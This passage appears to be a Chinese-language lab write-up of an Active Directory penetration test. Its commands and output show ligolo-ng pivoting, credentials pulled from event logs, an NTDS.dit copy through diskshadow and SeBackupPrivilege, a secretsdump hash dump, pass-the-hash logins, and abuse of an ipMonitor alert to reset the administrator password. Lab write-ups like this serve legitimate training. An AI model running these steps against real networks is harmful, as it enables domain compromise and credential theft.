Candidates.#1....: dataking -> dasuag101 Hardware.Mon.#1..: Util: 84% Started: Thu Jan 23 14:33:24 2025 Stopped: Thu Jan 23 14:33:34 2025
Doublle Pivot 在 ligolo-ng proxy 工具中添加监听器并创建 interface
1 2 3 4 [Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:11601 --to 10.10.16.2:11601 --tcp INFO[3551] Listener 0 created on remote agent! [Agent : root@WEB-NIX01] » ifcreate --name ligolo2 [Agent : root@WEB-NIX01] » route_add --name ligolo2 --route 172.16.210.0/24
通过 evil-winrm 工具将 ligolo-ng agent.exe 上传到 DC01 机器,然后执行下方命令
1 .\agent.exe -connect 172.16.139.10:11601 -ignore-cert
Another Intranet DC02 1 evil-winrm -i 172.16.210.5 -u svc_datakeeper -p data@system
Privilege Escalation svc_datakeeper 域用户属于 Event Log Readers 组 ,此组权限可以查询安全事件日志
读取最新的安全日志并筛选出 /user
1 wevtutil qe Security /rd:true /f:text | Select-String "/user"
显示了一条日志记录,使用 net.exe 命令挂载了共享目录,并使用了 svc_veracrypt 用户凭据
1 svc_veracrypt:Au10_B@ckuP_cRy3t
svc_veracrypt 用户属于 Backup Operators 组,此组权限允许遍历任何文件夹并列出文件夹内容,但不能使用标准复制命令来执行此操作
以 svc_veracrypt 用户身份链接 winrm
1 evil-winrm -i 172.16.210.5 -u svc_veracrypt -p 'Au10_B@ckuP_cRy3t'
NTDS.dit文件默认处于锁定状态,可以使用 Windows diskshadow 实用程序创建C驱动器的卷影副本并将其公开为X驱动器
在 winrm 中,无法交互使用命令,编写 test.dsh 文件
1 2 3 4 5 6 set metadata C:\Windows\Temp\meta.cab set context persistent nowriters add volume C: alias cdrive create expose %cdrive% X: exit
unix 格式转 dos 格式
通过 evil-winrm 上传到 DC02 机器
1 diskshadow.exe /s test.dsh
然后通过 evil-winrm 将这两个 SeBackupPrivilege Tools dll 文件传到 DC02 机器,再导入,然后复制文件 ntds.dit,再利用 evil-winrm 下载
1 2 3 Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit .\ntds.dit
转储 HKLM\SYSTEM , 同样的方法下载
1 reg save HKLM\SYSTEM SYSTEM.SAV
使用 impacket-secretsdump 工具提取凭据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV local Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x89a11ee03c83c2e093cc9f14ef3800ab [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 81db2a47d32784558062c54bfad8d792 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:8cb646a4485952a76117a33686bceef3::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC02$:1000:aad3b435b51404eeaad3b435b51404ee:fb89d657b52110d30c169f103b6ce216::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:12b0dffbe4f3835ae32bea420c1b5a76::: SQL01$:1103:aad3b435b51404eeaad3b435b51404ee:04ac3c85573b3b32865d442218394651::: ILF-XRG$:1104:aad3b435b51404eeaad3b435b51404ee:6656bfee5d67c93f118b1f80ac63fc3e::: MAINLON$:1105:aad3b435b51404eeaad3b435b51404ee:afb8942d32adc50ef1c25e34c7574e10::: CISERVER$:1106:aad3b435b51404eeaad3b435b51404ee:41955c81b97f5d719965af5b7eb20759::: <SNIP>
Credential Theft 1 evil-winrm -i 172.16.210.5 -u administrator -H 8cb646a4485952a76117a33686bceef3
在 C:\Users\Administrator\Documents 目录下,有一个后缀名为 Cred 的文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 Evil-WinRM* PS C:\Users\Administrator\Documents> cat svc_ipmi.Cred <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">svc_ipmi</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a839b52ca6a9c146ba898a954df8ee3a0000000002000000000003660000c000000010000000e02382774212b8748d49f70cf2acb3ba0000000004800000a000000010000000e67a0abc3bd895cbed1fccf9269154eb180000001dd70bbd086859fa24b317f632e71ec5ce2ce922090d497b140000009ced3f85e310d3b8f1acaaa756be95331ae8b233</SS> </Props> </Obj> </Objs>
询问 Chatgpt
成功读取凭证
Infomation Gathering fping 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ fping -asqg 172.16.210.0/24 172.16.210.3 172.16.210.5 172.16.210.21 172.16.210.34 254 targets 4 alive 250 unreachable 0 unknown addresses 1000 timeouts (waiting for response) 1004 ICMP Echos sent 4 ICMP Echo Replies received 0 other ICMP received 327 ms (min round trip time) 378 ms (avg round trip time) 475 ms (max round trip time) 9.766 sec (elapsed real time)
nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ nmap --open -PE -oA nmap_1k -iL host.list Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 15:06 EST Nmap scan report for 172.16.210.21 Host is up (0.33s latency). Not shown: 996 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8080/tcp open http-proxy Nmap scan report for 172.16.210.34 Host is up (0.35s latency). Not shown: 997 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 873/tcp open rsync 8084/tcp open websnp Nmap done: 2 IP addresses (2 hosts up) scanned in 55.63 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 $ nmap --open -p- -A -PE -oA nmap_all -iL host.list Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 15:24 EST WARNING: Service 172.16.210.34:8084 had already soft-matched rtsp, but now soft-matched sip; ignoring second value Nmap scan report for 172.16.210.21 Host is up (0.28s latency). Not shown: 65521 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 8080/tcp open http-proxy? 21410/tcp open unknown 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21410-TCP:V=7.94SVN%I=7%D=1/23%Time=6792A7C5%P=aarch64-unknown-linu SF:x-gnu%r(NULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06 SF:\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(Generi SF:cLines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x SF:20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(GetRequest,2 SF:E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe SF:\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(HTTPOptions,2E,"\0\0 SF:\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\ SF:0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(RTSPRequest,2E,"\0\0\x18\x0 SF:4\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01 SF:\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(RPCCheck,2E,"\0\0\x18\x04\0\0\0\0\ SF:0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x SF:08\0\0\0\0\0\0\?\0\x01")%r(DNSVersionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\ SF:0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04 SF:\x08\0\0\0\0\0\0\?\0\x01")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0 SF:\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x0 SF:4\x08\0\0\0\0\0\0\?\0\x01")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\ SF:0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\ SF:0\0\?\0\x01")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0 SF:\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\? SF:\0\x01")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0 SF:\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0 SF:\?\0\x01")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x0 SF:5\0@\0\0\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\ SF:x01")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0 SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(SM SF:BProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0 SF:\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01")%r(X11Probe,2 SF:E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0@\0\0\0\x05\0@\0\0\0\x06\0\0\x20\0\xfe SF:\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\x01"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): IBM z/OS 2.1.X (85%) OS CPE: cpe:/o:ibm:zos:2.1 Aggressive OS guesses: IBM z/OS 2.1 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-01-23T20:37:34 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: ADMIN01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:f9 (VMware) TRACEROUTE HOP RTT ADDRESS 1 279.59 ms 172.16.210.21 Nmap scan report for 172.16.210.34 Host is up (0.24s latency). Not shown: 65532 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 873/tcp open rsync (protocol version 31) 8084/tcp open rtsp |_rtsp-methods: ERROR: Script execution failed (use -d to debug) | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 500 Internal Server Error | Date: Thu, 23 Jan 2025 20:34:16 GMT | Server: Mono.WebServer.XSP/4.7.1.0 Linux | Connection: close | Connection: close | Content-Type: text/html; charset=us-ascii | Content-Length: 9169 | <?xml version="1.0" encoding="utf-8"?> | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <style type="text/css"> | body { background-color: #FFFFFF; font-size: .75em; font-family: Verdana, Helvetica, Sans-Serif; margin: 0; padding: 0; color: #696969; } | a:link { color: #000000; text-decoration: underline; } | a:visited { color: #000000; } | a:hover { color: #000000; text-decoration: none; } | a:active { color: #12eb87; } | margin-bottom: 20px; line-height: 1.6em; } | font-size: 1.2em; margin-left: 20px; margin-top: 0px; } | GetRequest: | HTTP/1.0 400 Bad request | Date: Thu, 23 Jan 2025 20:34:14 GMT | Server: Mono.WebServer.XSP/4.7.1.0 Linux | Connection: close | Connection: close | Date: Thu, 23 Jan 2025 20:34:14 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 4890 | <?xml version="1.0" encoding="utf-8"?> | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <style type="text/css"> | body { background-color: #FFFFFF; font-size: .75em; font-family: Verdana, Helvetica, Sans-Serif; margin: 0; padding: 0; color: #696969; } | a:link { color: #000000; text-decoration: underline; } | a:visited { color: #000000; } | a:hover { color: #000000; text-decoration: none; } | a:active { color: #12eb87; } | margin-bottom: 20px; line-height: 1.6em; } |_ font-size: 1.2em; margin-left: 20px; margin-top: 0px; } 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8084-TCP:V=7.94SVN%I=7%D=1/23%Time=6792A7C6%P=aarch64-unknown-linux SF:-gnu%r(GetRequest,140E,"HTTP/1\.0\x20400\x20Bad\x20request\r\nDate:\x20 SF:Thu,\x2023\x20Jan\x202025\x2020:34:14\x20GMT\r\nServer:\x20Mono\.WebSer SF:ver\.XSP/4\.7\.1\.0\x20Linux\r\nConnection:\x20close\r\nConnection:\x20 SF:close\r\nDate:\x20Thu,\x2023\x20Jan\x202025\x2020:34:14\x20GMT\r\nConte SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x204890\r\n\ SF:r\n<\?xml\x20version=\"1\.0\"\x20encoding=\"utf-8\"\?>\n<!DOCTYPE\x20ht SF:ml\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transitional//EN\"\x2 SF:0\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\.dtd\">\n<html SF:\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\n<head>\n<style\x20type=\ SF:"text/css\">\nbody\x20{\x20background-color:\x20#FFFFFF;\x20font-size:\ SF:x20\.75em;\x20font-family:\x20Verdana,\x20Helvetica,\x20Sans-Serif;\x20 SF:margin:\x200;\x20padding:\x200;\tcolor:\x20#696969;\x20}\na:link\x20{\x SF:20color:\x20#000000;\x20text-decoration:\x20underline;\x20}\na:visited\ SF:x20{\x20color:\x20#000000;\x20}\na:hover\x20{\x20color:\x20#000000;\x20 SF:text-decoration:\x20none;\x20}\na:active\x20{\x20color:\x20#12eb87;\x20 SF:}\np,\x20ul\x20{\tmargin-bottom:\x2020px;\x20line-height:\x201\.6em;\x2 SF:0}\npre\x20{\x20font-size:\x201\.2em;\tmargin-left:\x2020px;\x20margin- SF:top:\x200px;\x20}\nh1,\x20")%r(FourOhFourRequest,24AD,"HTTP/1\.0\x20500 SF:\x20Internal\x20Server\x20Error\r\nDate:\x20Thu,\x2023\x20Jan\x202025\x SF:2020:34:16\x20GMT\r\nServer:\x20Mono\.WebServer\.XSP/4\.7\.1\.0\x20Linu SF:x\r\nConnection:\x20close\r\nConnection:\x20close\r\nContent-Type:\x20t SF:ext/html;\x20charset=us-ascii\r\nContent-Length:\x209169\r\n\r\n<\?xml\ SF:x20version=\"1\.0\"\x20encoding=\"utf-8\"\?>\n<!DOCTYPE\x20html\x20PUBL SF:IC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http:// SF:www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\.dtd\">\n<html\x20xmlns= SF:\"http://www\.w3\.org/1999/xhtml\">\n<head>\n<style\x20type=\"text/css\ SF:">\nbody\x20{\x20background-color:\x20#FFFFFF;\x20font-size:\x20\.75em; SF:\x20font-family:\x20Verdana,\x20Helvetica,\x20Sans-Serif;\x20margin:\x2 SF:00;\x20padding:\x200;\tcolor:\x20#696969;\x20}\na:link\x20{\x20color:\x SF:20#000000;\x20text-decoration:\x20underline;\x20}\na:visited\x20{\x20co SF:lor:\x20#000000;\x20}\na:hover\x20{\x20color:\x20#000000;\x20text-decor SF:ation:\x20none;\x20}\na:active\x20{\x20color:\x20#12eb87;\x20}\np,\x20u SF:l\x20{\tmargin-bottom:\x2020px;\x20line-height:\x201\.6em;\x20}\npre\x2 SF:0{\x20font-size:\x201\.2em;\tmargin-left:\x2020px;\x20margin-top:\x200p SF:x;\x20}\nh1,\x20h2,\x20h3,\x20h4,\x20h5,\x20h6\x20{\x20fon"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): IBM z/OS 1.11.X|2.1.X (85%) OS CPE: cpe:/o:ibm:zos:1.11 cpe:/o:ibm:zos:2.1 Aggressive OS guesses: IBM z/OS 1.11 (85%), IBM z/OS 2.1 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 239.77 ms 172.16.210.34 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 904.39 seconds
Web Application 172.16.210.21:8080 使用窃取的凭证登录
查看版本信息
官方文档 Create an alert in ipMonitor External Process monitor
在 http://172.16.210.21:8080/cfg/cgi?sid=293795323809&area=self&action=config& 选择 Alert List
Add Alert
Add Monitors 然后选择 ADMIN01 C:\ Drivespace
Add Action 选择 Extermal Process,跳转到一个页面
在这个页面中,填写 Identification 和 Action Parameters 表单
然后点击菜单栏的 Force Test ,执行下方命令修改 administrator 的密码
1 /c "net user administrator NewPasswrod123!"
使用 evil-winrm 工具连接到 Admin01 机器
1 administrator:NewPassword123!
172.16.210.34:8084
